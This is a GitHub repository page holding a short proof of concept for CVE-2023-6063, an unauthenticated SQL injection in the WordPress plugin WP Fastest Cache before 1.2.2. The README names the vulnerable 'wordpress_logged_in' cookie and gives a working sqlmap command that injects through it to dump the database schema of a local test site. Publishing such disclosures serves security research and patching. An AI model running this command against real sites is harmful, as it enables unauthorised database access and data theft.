thesafdari / CVE-2023-6063 Public

Notifications You must be signed in to change notification settings
Fork 0
Star 7

CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)

7 stars 0 forks Branches Tags Activity

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
README.md		README.md
image_1.png		image_1.png
image_2.png		image_2.png

Repository files navigation

CVE-2023-6063 PoC

Reference

Unauthenticated SQL Injection Vulnerability Addressed in WP Fastest Cache 1.2.2 | WPScan

Plugin setting

Enable "WP Fastest Cache".

PoC

The "wordpress_logged_in" cookie parameter is vulnerable.

$ python sqlmap.py --dbms=mysql -u "http://127.0.0.1/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --schema

About

CVE-2023-6063 (WP Fastest Cache < 1.2.2 - UnAuth SQL Injection)

Report repository

Releases

No releases published

Packages

No packages published